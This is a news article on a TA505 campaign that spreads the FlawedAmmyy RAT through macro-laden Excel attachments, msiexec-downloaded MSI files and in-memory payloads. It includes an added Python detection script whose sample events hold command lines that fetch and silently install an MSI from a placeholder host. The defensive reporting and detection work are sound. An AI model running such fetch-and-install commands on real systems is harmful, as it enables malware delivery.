Microsoft has warned of a newly discovered malicious campaign that targets victims' systems to deliver the notorious FlawedAmmyy RAT directly into memory.
FlawedAmmyy is a remote access Trojan (RAT) that allows attackers to gain full access to their victims' machines and move laterally across a network.
The Trojan can intercept important information from a system, such as login files and credentials, capture screenshots, and even give an attacker access to the victim's computer camera.
The threat actor associated with older campaigns that attempted to deploy this malware is TA505, which is best known for distributing the Dridex banking Trojan and the Locky ransomware.
According to Microsoft, the attack begins with malicious emails containing .xls attachments with Korean-language content.
As soon as the user opens the file, it automatically runs a macro that executes the legitimate msiexec.exe tool, which in turn downloads an MSI file.
Within this MSI file, the attackers hide an executable designed to decrypt and execute another executable file in memory as soon as it is opened.
“This executable file downloads and decrypts another file, wsus.exe, which is also digitally signed. Wsus.exe decrypts and runs the final payload directly in memory. The final payload is the FlawedAmmyy Trojan,” explains Microsoft Security Intelligence in a tweet.
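The first stage described above (an Office document whose macro launches msiexec.exe to fetch a remote MSI) leaves a recognisable process-creation trail. The following detection sketch is an added example, not code from Microsoft or from the original article; the event field names, the `detect` and `office_ancestor` helpers, and the sample events with their placeholder host are all constructed assumptions.

```python
import re
from ntpath import basename  # parses Windows paths on any OS

# Constructed process-creation events; field names are assumptions, hosts are placeholders.
EVENTS = [
    {"pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": r"C:\Program Files\Microsoft Office\Office16\EXCEL.EXE",
     "cmdline": r'EXCEL.EXE "C:\Users\u\Downloads\invoice.xls"'},
    {"pid": 300, "ppid": 200, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c msiexec.exe /i http://example.invalid/pkg.msi /q"},
    {"pid": 301, "ppid": 300, "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": "msiexec.exe /i http://example.invalid/pkg.msi /q"},
    {"pid": 400, "ppid": 100, "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r'msiexec.exe /i "C:\Temp\setup.msi"'},      # local install, benign
    {"pid": 500, "ppid": 100, "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": "msiexec.exe /i https://example.invalid/tool.msi"},  # remote, no Office parent
]

OFFICE = {"excel.exe", "winword.exe", "powerpnt.exe"}
URL_RE = re.compile(r"https?://[^\s\"']+", re.I)

def office_ancestor(event, by_pid, max_hops=4):
    """Return the nearest Office ancestor's name within max_hops, else None."""
    seen, cur = {event["pid"]}, event
    for _ in range(max_hops):
        cur = by_pid.get(cur["ppid"])
        if cur is None or cur["pid"] in seen:  # missing parent or PID loop
            return None
        seen.add(cur["pid"])
        if basename(cur["image"]).lower() in OFFICE:
            return basename(cur["image"]).lower()
    return None

def detect(events):
    """Flag msiexec.exe launches that fetch a remote MSI beneath an Office process."""
    by_pid = {e["pid"]: e for e in events}
    alerts = []
    for e in events:
        if basename(e["image"]).lower() != "msiexec.exe":
            continue
        url = URL_RE.search(e["cmdline"])
        parent = office_ancestor(e, by_pid)
        if url and parent:
            alerts.append({"pid": e["pid"], "office_ancestor": parent,
                           "url": url.group(0)})
    return alerts

if __name__ == "__main__":
    print(detect(EVENTS))
```

Walking several ancestors rather than only the direct parent catches the case where the macro goes through an intermediate shell such as cmd.exe before msiexec.exe starts.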
Earlier this month, Trend Micro reported on TA505 campaigns targeting various Latin American and Asian countries with the FlawedAmmyy RAT and other RATs, revealing that the same infection mechanism has been in use for over two months.
In fact, the threat actor has been using backdoors such as FlawedAmmyy, Remote Manipulator (RMS), ServHelper and others for more than 6 months.